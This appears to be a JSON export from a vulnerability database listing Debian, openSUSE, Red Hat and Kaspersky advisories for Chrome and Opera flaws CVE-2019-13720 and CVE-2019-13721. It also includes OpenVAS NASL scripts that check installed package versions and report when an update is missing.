78.0.3904.97-1~deb10u1.\n\nWe recommend that you upgrade your chromium packages.\n\nFor the detailed security status of chromium please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/chromium\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 8, "modified": "2019-11-10T19:17:01", "published": "2019-11-10T19:17:01", "id": "DEBIAN:DSA-4562-1:58850", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2019/msg00214.html", "title": "[SECURITY] [DSA 4562-1] chromium security update", "type": "debian", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2019-11-03T04:05:38", "bulletinFamily": "unix", "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "description": "This update for chromium fixes the following issues:\n\n Chromium was updated to 78.0.3904.87 boo#1155643:\n\n * CVE-2019-13721: Use-after-free in PDFium\n * CVE-2019-13720: Use-after-free in audio\n\n", "edition": 1, "modified": "2019-11-03T00:14:07", "published": "2019-11-03T00:14:07", "id": "OPENSUSE-SU-2019:2421-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00001.html", "title": "Security update for chromium (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-11-04T04:05:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "description": "This update for chromium fixes the following issues:\n\n Chromium was updated to 78.0.3904.87 boo#1155643:\n\n * CVE-2019-13721: Use-after-free in PDFium\n * CVE-2019-13720: Use-after-free in audio\n\n\n This update was imported from the openSUSE:Leap:15.0:Update update project.\n\n", "edition": 1, "modified": "2019-11-04T00:14:15", "published": "2019-11-04T00:14:15", "id": "OPENSUSE-SU-2019:2426-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00004.html", "title": "Security update for chromium (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-11-04T18:08:44", "bulletinFamily": "unix", "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "description": "This update for chromium fixes the following issues:\n\n Chromium was updated to 78.0.3904.87 boo#1155643:\n\n * CVE-2019-13721: Use-after-free in PDFium\n * CVE-2019-13720: Use-after-free in audio\n\n\n This update was imported from the openSUSE:Leap:15.1:Update update project.\n\n", "edition": 1, "modified": "2019-11-04T15:11:31", "published": "2019-11-04T15:11:31", "id": "OPENSUSE-SU-2019:2427-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00005.html", "title": "Security update for chromium (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-11T15:24:29", "bulletinFamily": "unix", "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "description": "This update for opera fixes the following issues:\n\n Opera was updated to version 65.0.3467.62\n\n - CHR-7658 Update chromium on desktop-stable-78-3467 to 78.0.3904.108\n - DNA-81387 Remove support for old bundle structure in signing scripts\n - DNA-81675 Update widevine signature localisation in signed packages\n - DNA-81884 [Advanced content blocking] Ads are blocked for whitelisted\n page in Incognito\n - DNA-82230 [Mac] URL is not correctly aligned when the Geolocation is ON\n - DNA-82368 Generating diffs for unsinged packages doesn\u00e2\u0080\u0099t work\n - DNA-82414 Wrong number of trackers displayed just after deactivating\n adblocker\n - DNA-82470 [Linux] Snap package doesn\u00e2\u0080\u0099t recognise GNOME 3.24 platform\n snap connection\n - DNA-82473 <a rel=\"nofollow\" href=\"https://www.nba.com/standings\">https://www.nba.com/standings</a> not working with AdBlocker\n enabled\n - DNA-82484 Update content blocking icon\n - DNA-82485 [Mac 10.15] Opera installer error at the end of installation\n process\n - DNA-82508 [Adblocker] Predefault lists can not be unchecked\n - DNA-82557 Address bar dropdown launches HTTP GETs for every autocomplete\n - DNA-82596 Do not block first-party \u00e2\u0080\u0098trackers\u00e2\u0080\u0099\n - DNA-82616 Settings \u00e2\u0080\u0093 Tracker Blocker \u00e2\u0080\u0093 Add \u00e2\u0080\u009cLearn more\u00e2\u0080\u009d link\n - DNA-82626 [Win] High CPU usage due to media indicator animation\n - DNA-82647 Tab icons mixed after Tab closing\n - DNA-82742 Pages won\u00e2\u0080\u0099t load after closing private mode\n - DNA-82768 Mark also the reference group in \u00e2\u0080\u009cexp\u00e2\u0080\u009d header for DNA-81658\n - DNA-82840 Disable favicon fetching for typed URLs\n\n Complete Opera 65.0 changelog at:\n\n <a rel=\"nofollow\" href=\"https://blogs.opera.com/desktop/changelog-for-65/\">https://blogs.opera.com/desktop/changelog-for-65/</a>\n\n Update to version 64.0.3417.92\n\n - DNA-81358 Wrong key color on extension popup in dark mode\n - DNA-82208 Cherry-pick CVE-2019-13721 and CVE-2019-13720\n\n Update to version 64.0.3417.83\n\n - DNA-79676 Use FFmpegDemuxer to demux ADTS\n - DNA-81010 Spinner takes a lot of cpu\n - DNA-81385 Keys on some popups in dark mode can\u00e2\u0080\u0099t be hovered\n - DNA-81494 [Mac] Snap onboarding doesn\u00e2\u0080\u0099t appear while the icon still\n flashes\n - DNA-82003 Restore legacy path for AudioFileReader\n - DNA-82019 Enable #ffmpeg-demuxer-everywhere by default in developer\n - DNA-82028 Enable #ffmpeg-demuxer-everywhere by default in stable on macOS\n\n Update to version 64.0.3417.73\n\n - CHR-7598 Update chromium on desktop-stable-77-3417 to 77.0.3865.120\n - DNA-80049 The upper border of \u00e2\u0080\u009cAdd to bookmarks bar\u00e2\u0080\u009d popup is cut\n off in white mode\n - DNA-80395 Menu popup borders in Settings are invisible in Dark mode\n - DNA-81263 Change the continue section buttons visibility as in\n description\n - DNA-81304 Crash at chrome::NewTab(Browser*)\n - DNA-81650 Easy Setup Style looks weird\n - DNA-81708 Missing dependency on //chrome/common:buildflags\n - DNA-81732 [Mac][Catalina] Cannot maximize a window after it\u00e2\u0080\u0099s been\n minimized\n - DNA-81737 Renderer crash on <a rel=\"nofollow\" href=\"https://codesandbox.io/s/vanilla-ts\">https://codesandbox.io/s/vanilla-ts</a>\n - DNA-81753 Pinned tab only remembered after next restart\n - DNA-81769 Investigate reports about slow speed dial loading in O64 blog\n comments\n - DNA-81859 [Mac 10.15] Crash whenever navigating to any page\n - DNA-81893 Get Personalised news on SpeedDials broken layout\n\n Update to version 64.0.3417.61\n\n - DNA-80760 Sidebar Messenger icon update\n - DNA-81165 Remove sharing service\n - DNA-81211 [Advanced content blocking] Can not turn off ad blocking in\n private mode\n - DNA-81323 content_filter::RendererConfigProvider destroyed\n on wrong sequence\n - DNA-81487 [VPN disclaimer][da, ta] Text should be multiline\n - DNA-81545 opr-session entry for Google ads not working\n - DNA-81580 Speed dials\u00e2\u0080\u0099 colours change after Opera update\n - DNA-81597 [Adblocker] Google Ads link hides if clicking\n - DNA-81639 Widevine verification status is PLATFORM_TAMPERED\n - DNA-81237 [Advanced content blocking] noCoinis not enabled by default\n - DNA-81375 Adblocking_AddToWhitelist_Popup and\n Adblocking_RemoveFromWhitelist_Popup metric not recorded in stats\n - DNA-81413 Error in console when Start Page connects to My Flow\n - DNA-81435 Adjust VPN disclaimer to longer strings [de]\n\n Update to version 64.0.3417.47\n\n - DNA-80531 [Reborn3] Unify Switches\n - DNA-80738 \u00e2\u0080\u009cHow to protect my privacy\u00e2\u0080\u009d link\n - DNA-81162 Enable #advanced-content-blocking\n on developer stream\n - DNA-81202 Privacy Protection popup doesn\u00e2\u0080\u0099t resize after enabling\n blockers\n - DNA-81230 [Mac] Drop support for 10.10\n - DNA-81280 Adjust button width to the shorter string\n - DNA-81295 Opera 64 translations\n - DNA-81346 Enable #advanced-content-blocking on all streams\n - DNA-81434 Turn on #new-vpn-flow in all streams\n - DNA-81436 Import translations from Chromium to O64\n - DNA-81460 Promote O64 to stable\n - DNA-81461 Snap onboarding is cut\n - DNA-81467 Integrate missing translations (Chinese, MS and TL) to O64/65\n - DNA-81489 Start page goes into infinite loop\n\n Complete Opera 64.0 changelog at:\n <a rel=\"nofollow\" href=\"https://blogs.opera.com/desktop/changelog-for-64/\">https://blogs.opera.com/desktop/changelog-for-64/</a>\n\n Update to version 63.0.3368.94\n\n - CHR-7516 Update chromium on master to 78.0.3887.7\n - DNA-80966 [Linux] Integrate a new key into our packages\n\n Update to version 63.0.3368.88\n\n - DNA-79103 Saving link to bookmarks saves it to Other bookmarks folder\n - DNA-79455 Crash at views::MenuController::\n FindNextSelectableMenuItem(views::MenuItemView*, int, views::\n MenuController::SelectionIncrementDirectionType, bool)\n - DNA-79579 Continuous packages using new_mac_bundle_structure do not run\n - DNA-79611 Update opauto_paths.py:GetResourcesDir\n - DNA-79621 Add support for new bundle structure to old autoupdate clients\n - DNA-79906 Fix package build\n - DNA-80131 Sign Opera Helper(GPU).app\n - DNA-80191 Fix\n opera_components/tracking_data/tracking_data_paths.cc\n - DNA-80638 Cherry-pick fix for CreditCardTest.\n UpdateFromImportedCard_ExpiredVerifiedCardUpdatedWithSameName\n - DNA-80801 Very slow tab deletion process\n\n", "edition": 1, "modified": "2019-12-10T12:12:16", "published": "2019-12-10T12:12:16", "id": "OPENSUSE-SU-2019:2664-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00022.html", "title": "Security update for opera (important)", "type": "suse", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-07T04:02:01", "bulletinFamily": "unix", "cvelist": ["CVE-2019-13704", "CVE-2019-5871", "CVE-2019-13714", "CVE-2019-13659", "CVE-2019-13666", "CVE-2019-13687", "CVE-2019-13676", "CVE-2019-13677", "CVE-2019-5850", "CVE-2019-5869", "CVE-2019-13686", "CVE-2019-5880", "CVE-2019-5853", "CVE-2019-13680", "CVE-2019-13664", "CVE-2019-13699", "CVE-2019-13662", "CVE-2019-13720", "CVE-2019-5877", "CVE-2019-5868", "CVE-2019-13719", "CVE-2019-13665", "CVE-2019-13674", "CVE-2019-13706", "CVE-2019-5875", "CVE-2019-5857", "CVE-2019-13678", "CVE-2019-13694", "CVE-2019-13718", "CVE-2019-13701", "CVE-2019-13679", "CVE-2019-13702", "CVE-2019-13673", "CVE-2019-13670", "CVE-2019-13713", "CVE-2019-5861", "CVE-2019-13700", "CVE-2019-5876", "CVE-2019-13671", "CVE-2019-13682", "CVE-2019-13707", "CVE-2019-13669", "CVE-2019-13681", "CVE-2019-13685", "CVE-2019-13695", "CVE-2019-5870", "CVE-2019-13717", "CVE-2019-13660", "CVE-2019-5863", "CVE-2019-5878", "CVE-2019-5854", "CVE-2019-13709", "CVE-2019-5851", "CVE-2019-13661", "CVE-2019-13721", "CVE-2019-5881", "CVE-2019-5879", "CVE-2019-13696", "CVE-2019-13703", "CVE-2019-13693", "CVE-2019-5852", "CVE-2019-13668", "CVE-2019-13663", "CVE-2019-5862", "CVE-2019-13715", "CVE-2019-13683", "CVE-2019-5872", "CVE-2019-5865", "CVE-2019-13697", "CVE-2019-15903", "CVE-2019-5867", "CVE-2019-5864", "CVE-2019-5859", "CVE-2019-13708", "CVE-2019-5860", "CVE-2019-5858", "CVE-2019-13705", "CVE-2019-13675", "CVE-2019-13710", "CVE-2019-5874", "CVE-2019-5856", "CVE-2019-13667", "CVE-2019-5855", "CVE-2019-13688", "CVE-2019-13711", "CVE-2019-13716"], "description": "This update for chromium fixes the following issues:\n\n Chromium was updated to 78.0.3904.87:\n (boo#1155643,boo#1154806,boo#1153660,\n boo#1151229,boo#1149143,boo#1145242,boo#1143492)\n\n Security issues fixed with this version update:\n\n * CVE-2019-13721: Use-after-free in PDFium\n * CVE-2019-13720: Use-after-free in audio\n * CVE-2019-13699: Use-after-free in media\n * CVE-2019-13700: Buffer overrun in Blink\n * CVE-2019-13701: URL spoof in navigation\n * CVE-2019-13702: Privilege elevation in Installer\n * CVE-2019-13703: URL bar spoofing\n * CVE-2019-13704: CSP bypass\n * CVE-2019-13705: Extension permission bypass\n * CVE-2019-13706: Out-of-bounds read in PDFium\n * CVE-2019-13707: File storage disclosure\n * CVE-2019-13708: HTTP authentication spoof\n * CVE-2019-13709: File download protection bypass\n * CVE-2019-13710: File download protection bypass\n * CVE-2019-13711: Cross-context information leak\n * CVE-2019-15903: Buffer overflow in expat\n * CVE-2019-13713: Cross-origin data leak\n * CVE-2019-13714: CSS injection\n * CVE-2019-13715: Address bar spoofing\n * CVE-2019-13716: Service worker state error\n * CVE-2019-13717: Notification obscured\n * CVE-2019-13718: IDN spoof\n * CVE-2019-13719: Notification obscured\n * CVE-2019-13693: Use-after-free in IndexedDB\n * CVE-2019-13694: Use-after-free in WebRTC\n * CVE-2019-13695: Use-after-free in audio\n * CVE-2019-13696: Use-after-free in V8\n * CVE-2019-13697: Cross-origin size leak.\n * CVE-2019-13685: Use-after-free in UI\n * CVE-2019-13688: Use-after-free in media\n * CVE-2019-13687: Use-after-free in media\n * CVE-2019-13686: Use-after-free in offline pages\n * CVE-2019-5870: Use-after-free in media\n * CVE-2019-5871: Heap overflow in Skia\n * CVE-2019-5872: Use-after-free in Mojo\n * CVE-2019-5874: External URIs may trigger other browsers\n * CVE-2019-5875: URL bar spoof via download redirect\n * CVE-2019-5876: Use-after-free in media\n * CVE-2019-5877: Out-of-bounds access in V8\n * CVE-2019-5878: Use-after-free in V8\n * CVE-2019-5879: Extension can bypass same origin policy\n * CVE-2019-5880: SameSite cookie bypass\n * CVE-2019-5881: Arbitrary read in SwiftShader\n * CVE-2019-13659: URL spoof\n * CVE-2019-13660: Full screen notification overlap\n * CVE-2019-13661: Full screen notification spoof\n * CVE-2019-13662: CSP bypass\n * CVE-2019-13663: IDN spoof\n * CVE-2019-13664: CSRF bypass\n * CVE-2019-13665: Multiple file download protection bypass\n * CVE-2019-13666: Side channel using storage size estimate\n * CVE-2019-13667: URI bar spoof when using external app URIs\n * CVE-2019-13668: Global window leak via console\n * CVE-2019-13669: HTTP authentication spoof\n * CVE-2019-13670: V8 memory corruption in regex\n * CVE-2019-13671: Dialog box fails to show origin\n * CVE-2019-13673: Cross-origin information leak using devtools\n * CVE-2019-13674: IDN spoofing\n * CVE-2019-13675: Extensions can be disabled by trailing slash\n * CVE-2019-13676: Google URI shown for certificate warning\n * CVE-2019-13677: Chrome web store origin needs to be isolated\n * CVE-2019-13678: Download dialog spoofing\n * CVE-2019-13679: User gesture needed for printing\n * CVE-2019-13680: IP address spoofing to servers\n * CVE-2019-13681: Bypass on download restrictions\n * CVE-2019-13682: Site isolation bypass\n * CVE-2019-13683: Exceptions leaked by devtools\n * CVE-2019-5869: Use-after-free in Blink\n * CVE-2019-5868: Use-after-free in PDFium ExecuteFieldAction\n * CVE-2019-5867: Out-of-bounds read in V8\n * CVE-2019-5850: Use-after-free in offline page fetcher\n * CVE-2019-5860: Use-after-free in PDFium\n * CVE-2019-5853: Memory corruption in regexp length check\n * CVE-2019-5851: Use-after-poison in offline audio context\n * CVE-2019-5859: res: URIs can load alternative browsers\n * CVE-2019-5856: Insufficient checks on filesystem: URI permissions\n * CVE-2019-5855: Integer overflow in PDFium\n * CVE-2019-5865: Site isolation bypass from compromised renderer\n * CVE-2019-5858: Insufficient filtering of Open URL service parameters\n * CVE-2019-5864: Insufficient port filtering in CORS for extensions\n * CVE-2019-5862: AppCache not robust to compromised renderers\n * CVE-2019-5861: Click location incorrectly checked\n * CVE-2019-5857: Comparison of -0 and null yields crash\n * CVE-2019-5854: Integer overflow in PDFium text rendering\n * CVE-2019-5852: Object leak of utility functions\n\n", "edition": 1, "modified": "2019-11-07T00:11:42", "published": "2019-11-07T00:11:42", "id": "OPENSUSE-SU-2019:2447-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00013.html", "title": "Security update for chromium (important)", "type": "suse", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "redhat": [{"lastseen": "2019-11-27T10:30:42", "bulletinFamily": "unix", "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "description": "Chromium is an open-source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 78.0.3904.87.\n\nSecurity Fix(es):\n\n* chromium-browser: use-after-free in audio (CVE-2019-13720)\n\n* chromium-browser: use-after-free in PDFium (CVE-2019-13721)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-11-07T12:06:23", "published": "2019-11-07T11:56:43", "id": "RHSA-2019:3775", "href": "https://access.redhat.com/errata/RHSA-2019:3775", "type": "redhat", "title": "(RHSA-2019:3775) Important: chromium-browser security update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "kaspersky": [{"lastseen": "2020-09-02T11:49:23", "bulletinFamily": "info", "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "description": "### *Detect date*:\n10/31/2019\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Google Chrome. Malicious users can exploit these vulnerabilities to cause denial of service, execute arbitrary code.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nGoogle Chrome earlier than 78.0.3904.87\n\n### *Solution*:\nUpdate to the latest version \n[Google Chrome download page](<https://www.google.com/chrome/browser/desktop/>)\n\n### *Original advisories*:\n[Stable Channel Update for Desktop](<https://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_31.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Google Chrome](<https://threats.kaspersky.com/en/product/Google-Chrome/>)\n\n### *CVE-IDS*:\n[CVE-2019-13721](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13721>)0.0Unknown \n[CVE-2019-13720](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13720>)0.0Unknown", "edition": 1, "modified": "2020-06-18T00:00:00", "published": "2019-10-31T00:00:00", "id": "KLA11601", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11601", "title": "\r KLA11601Multiple vulnerabilities in Google Chrome ", "type": "kaspersky", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-02T12:02:27", "bulletinFamily": "info", "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "description": "### *Detect date*:\n11/14/2019\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple vulnerabilities were found in Opera. Malicious users can exploit these vulnerabilities to execute arbitrary code, cause denial of service.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nOpera earlier than 65.0.3467.38\n\n### *Solution*:\nUpdate to the latest version \n[Download Opera](<https://www.opera.com>)\n\n### *Original advisories*:\n[Changelog for 65](<https://blogs.opera.com/desktop/changelog-for-65/#b3467.38>) \n[Stable Channel Update for Desktop](<https://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_31.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Opera](<https://threats.kaspersky.com/en/product/Opera/>)\n\n### *CVE-IDS*:\n[CVE-2019-13721](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13721>)0.0Unknown \n[CVE-2019-13720](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13720>)0.0Unknown", "edition": 1, "modified": "2020-06-18T00:00:00", "published": "2019-11-14T00:00:00", "id": "KLA11716", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11716", "title": "\r KLA11716Multiple vulnerabilities in Opera ", "type": "kaspersky", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2020-01-14T14:47:32", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "description": "The remote host is missing an update for the ", "modified": "2020-01-13T00:00:00", "published": "2020-01-09T00:00:00", "id": "OPENVAS:1361412562310877259", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310877259", "type": "openvas", "title": "Fedora Update for chromium FEDORA-2019-688d52f9ff", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.877259\");\n script_version(\"2020-01-13T11:49:13+0000\");\n script_cve_id(\"CVE-2019-13720\", \"CVE-2019-13721\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-13 11:49:13 +0000 (Mon, 13 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-09 07:34:34 +0000 (Thu, 09 Jan 2020)\");\n script_name(\"Fedora Update for chromium FEDORA-2019-688d52f9ff\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC31\");\n\n script_xref(name:\"FEDORA\", value:\"2019-688d52f9ff\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EIIDTZXEBWMS5CZ6MW6PPU7EZ4VIEFZY\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'chromium'\n package(s) announced via the FEDORA-2019-688d52f9ff advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Chromium is an open-source web browser, powered by WebKit (Blink).\");\n\n script_tag(name:\"affected\", value:\"'chromium' package(s) on Fedora 31.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC31\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium\", rpm:\"chromium~78.0.3904.87~1.fc31\", rls:\"FC31\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-29T15:31:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "modified": "2019-11-29T00:00:00", "published": "2019-11-04T00:00:00", "id": "OPENVAS:1361412562310815824", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815824", "type": "openvas", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop_31-2019-10)-Linux", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815824\");\n script_version(\"2019-11-29T08:04:17+0000\");\n script_cve_id(\"CVE-2019-13721\", \"CVE-2019-13720\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-11-29 08:04:17 +0000 (Fri, 29 Nov 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-11-04 12:00:17 +0530 (Mon, 04 Nov 2019)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop_31-2019-10)-Linux\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to\n\n - An use-after-free error in PDFium.\n\n - An use-after-free error in audio.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to execute arbitrary code or cause denial of service condition.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to 78.0.3904.87\n on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 78.0.3904.87 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://chromereleases.googleblog.com/2019/10/stable-channel-update-for-desktop_31.html\");\n script_xref(name:\"URL\", value:\"https://www.google.com/chrome\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_lin.nasl\");\n script_mandatory_keys(\"Google-Chrome/Linux/Ver\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nchr_ver = infos['version'];\nchr_path = infos['location'];\n\nif(version_is_less(version:chr_ver, test_version:\"78.0.3904.87\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"78.0.3904.87\", install_path:chr_path);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T16:51:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-13720", "CVE-2019-13721"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2019-11-03T00:00:00", "id": "OPENVAS:1361412562310852760", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852760", "type": "openvas", "title": "openSUSE: Security Advisory for chromium (openSUSE-SU-2019:2421-1)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852760\");\n script_version(\"2020-01-31T08:04:39+0000\");\n script_cve_id(\"CVE-2019-13720\", \"CVE-2019-13721\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:04:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-11-03 03:00:38 +0000 (Sun, 03 Nov 2019)\");\n script_name(\"openSUSE: Security Advisory for chromium (openSUSE-SU-2019:2421-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.0\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2019:2421-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2019-11/msg00001.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'chromium'\n package(s) announced via the openSUSE-SU-2019:2421-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n 